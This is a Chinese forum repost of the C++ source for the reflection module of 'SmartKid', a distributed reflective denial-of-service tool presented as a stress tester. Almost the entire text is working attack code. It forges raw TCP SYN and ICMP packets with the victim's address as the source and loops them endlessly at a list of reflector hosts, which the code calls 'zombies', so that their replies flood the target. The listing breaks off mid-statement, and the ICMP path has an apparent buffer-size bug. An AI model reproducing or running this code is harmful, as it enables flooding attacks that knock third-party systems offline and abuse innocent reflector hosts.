智慧小子SmartKid drdos循环反射部分源代码
鬼仔:前段时间发过智慧小子,现在作者提供了其循环反射部分的源代码。
信息来源:易做图八进制信息安全团队
项目名称:智慧小子SmartKid
项目作者:dream2fly[W.H.L][E.S.T]
联系方式:songbohr@163.com
项目类别:压力攻击测试程序
工作环境:win32(暂不支持XP SP2)有了成果要公开, 不要舍不得,不然很快会过时的。。。:)
ICMP部分包构造感觉有问题,希望能得到反馈意见。#include "StdAfx.h"
#include "drdos.h"
#include <Afxmt.h> //多线程头文件CDrdos::CDrdos(void)
{
}CDrdos::~CDrdos(void)
{
}std::vector<CString> g_reflectlist;
static const int SleepTimes=10; ///<休眠时间0.01s
static CCriticalSection Tlock; ///<关键区static SOCKET sock;
static SOCKADDR_IN syn_in;
static SOCKADDR_IN icmp_in;static IP_HEADER ipheader;
static TCP_HEADER tcpheader;
static ICMP_HEADER icmpheader;
static PSD_HEADER psdheader;void CDrdos::InitSynPacket(const u_long &target_ip, const u_short &target_port)
{
//填充IP首部
ipheader.h_verlen=(4<<4 | sizeof(IP_HEADER)/sizeof(unsigned long));
ipheader.tos=0;
ipheader.total_len=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER));
ipheader.ident=1;
ipheader.frag_and_flags=0x40;
ipheader.ttl=255; //最大
ipheader.proto=IPPROTO_TCP;
ipheader.checksum=0;
ipheader.sourceIP=htonl(target_ip);
ipheader.destIP=htonl(target_ip);//填充Tcp首部
tcpheader.th_dport=htons(target_port);
tcpheader.th_sport=htons(target_port);
tcpheader.th_seq=htonl(rand());
tcpheader.th_ack=0;
tcpheader.th_lenres=(sizeof(TCP_HEADER)/4<<4|0);
tcpheader.th_flag=2; //syn 00000010 修改这里来实现不同的标志位探测,2是SYN,1是FIN,16是ACK探测
tcpheader.th_win=htons(512);
tcpheader.th_urp=0;
tcpheader.th_sum=0;//填充TCP伪首部用来计算TCP头部的效验和
psdheader.saddr=ipheader.sourceIP;
psdheader.daddr=ipheader.destIP;
psdheader.mbz=0;
psdheader.ptcl=IPPROTO_TCP;
psdheader.tcpl=htons(sizeof(TCP_HEADER));
}void CDrdos::InitIcmpPacket(const u_long &target_ip, const u_short &target_port)
{
//填充IP首部
ipheader.h_verlen=(4<<4 | sizeof(IP_HEADER)/sizeof(unsigned long));
ipheader.tos=0;
ipheader.total_len=htons(sizeof(IP_HEADER)+sizeof(ICMP_HEADER));
ipheader.ident=1;
ipheader.frag_and_flags=0x40;
ipheader.ttl=255; //最大
ipheader.proto=IPPROTO_ICMP;
ipheader.checksum=0;
ipheader.sourceIP=htonl(target_ip);
ipheader.destIP=htonl(target_ip);//填充ICMP首部
icmpheader.ih_type=8;
icmpheader.ih_code=0;
icmpheader.ih_cksum=0;
icmpheader.ih_id=(USHORT)GetCurrentProcessId();
icmpheader.ih_seq=htons(u_short(rand()));
icmpheader.ih_timestamp=htonl(GetTickCount());
}DWORD CDrdos::syn_drdosthread(LPVOID param)
{
DWORD dwResult=0;
CString reflect_ip_port;
u_long reflect_ip;
u_short reflect_port;int randnum=0;
while(true)
{
Tlock.Lock();
for(std::vector<CString>::const_iterator iter=g_reflectlist.begin();iter!=g_reflectlist.end();++iter)
{
reflect_ip_port=*iter;
int index=reflect_ip_port.Find (":",0);
char *zombies_ip=new char[20];
memcpy(zombies_ip,reflect_ip_port,index);
zombies_ip[index]=0;
if( (reflect_ip=inet_addr(zombies_ip)) == INADDR_NONE)
{
delete []zombies_ip;
continue; //跳过无效IP地址
}
delete []zombies_ip;
reflect_port= atoi(reflect_ip_port.Right(reflect_ip_port.GetLength() - index - 1));if(randnum==2006)
{
randnum=0;
}
else
{
++randnum;
}
u_long seq_num = MakeRand32(randnum);ipheader.destIP=reflect_ip;
ipheader.ident = rand();
ipheader.checksum = 0;tcpheader.th_dport = htons(reflect_port);
tcpheader.th_seq = htonl(seq_num);
tcpheader.th_sum = 0;psdheader.daddr = ipheader.destIP;
//计算校验和
char SendBuff[128]={0};//计算TCP校验和
memcpy(SendBuff, &psdheader, sizeof(PSD_HEADER));
memcpy(SendBuff+sizeof(PSD_HEADER), &tcpheader, sizeof(TCP_HEADER));
tcpheader.th_sum=checksum((u_short *)SendBuff,sizeof(PSD_HEADER)+sizeof(TCP_HEADER));/////////
//计算IP检验和
memcpy(SendBuff, &ipheader, sizeof(IP_HEADER));
memcpy(SendBuff+sizeof(IP_HEADER), &tcpheader, sizeof(TCP_HEADER));
memset(SendBuff+sizeof(IP_HEADER)+sizeof(TCP_HEADER),0,4);
ipheader.checksum=checksum((u_short *)SendBuff,sizeof(IP_HEADER));syn_in.sin_family = AF_INET;
syn_in.sin_addr.s_addr = reflect_ip;
syn_in.sin_port = htons(reflect_port);//发送数据包
int ret=sendto(sock, SendBuff, sizeof(IP_HEADER)+sizeof(TCP_HEADER), 0, (struct sockaddr*)&syn_in, sizeof(syn_in));
if(ret==SOCKET_ERROR)
{
CString err;
err.Format("错误号:%d 请到http://www.dream2fly.net/forum提交这个错误号! 您提交的意见将会在下版本中改进。",WSAGetLastError());
MessageBox(NULL,err,"wrong",MB_OK);
return WSAGetLastError(); //XP sp2下raw socket send() 10004 Error,xp sp2下不支持raw socket
}
}
Tlock.Unlock();
}return dwResult;
}DWORD CDrdos::icmp_drdosthread(LPVOID param)
{
DWORD dwResult=0;//Tlock.Lock();
CString reflect_ip_port;
u_long reflect_ip;
u_short reflect_port;
//Tlock.Unlock();int randnum=0;
while(true)
{
for(std::vector<CString>::const_iterator iter=g_reflectlist.begin();iter!=g_reflectlist.end();++iter)
{
reflect_ip_port=*iter;
int index=reflect_ip_port.Find (":",0);
char *zombies_ip=new char[20];
memcpy(zombies_ip,reflect_ip_port,index);
zombies_ip[index]=0;
if( (reflect_ip=inet_addr(zombies_ip)) == INADDR_NONE)
{
delete []zombies_ip;
continue; //跳过无效IP地址
}
delete []zombies_ip;
reflect_port= atoi(reflect_ip_port.Right(reflect_ip_port.GetLength() - index - 1));if(randnum==2006)
{
randnum=0;
}
else
{
++randnum;
}
u_short seq_num = MakeRand16(randnum);ipheader.destIP = reflect_ip;
ipheader.ident = rand();
ipheader.checksum = 0;icmpheader.ih_cksum=0;
icmpheader.ih_id=(USHORT)GetCurrentProcessId();
icmpheader.ih_seq=htons(seq_num);
icmpheader.ih_timestamp=htonl(GetTickCount());//计算ICMP校验和
icmpheader.ih_cksum=checksum((u_short *)&icmpheader,sizeof(ICMP_HEADER));char SendBuff[128]={0};
//计算IP检验和
memcpy(SendBuff, &ipheader, sizeof(IP_HEADER));
memcpy(SendBuff+sizeof(IP_HEADER), &icmpheader, sizeof(ICMP_HEADER));
ipheader.checksum=checksum((u_short *)SendBuff,sizeof(IP_HEADER));icmp_in.sin_family = AF_INET;
icmp_in.sin_addr.s_addr =reflect_ip;
icmp_in.sin_port = htons(reflect_port);//发送数据包
int ret=sendto(sock, SendBuff, sizeof(IP_HEADER)+sizeof(TCP_HEADER), 0, (struct sockaddr*)&icmp_in, sizeof(icmp_in));
if(ret==SOCKET_ERROR
补充:综合编程 , 安全编程 ,
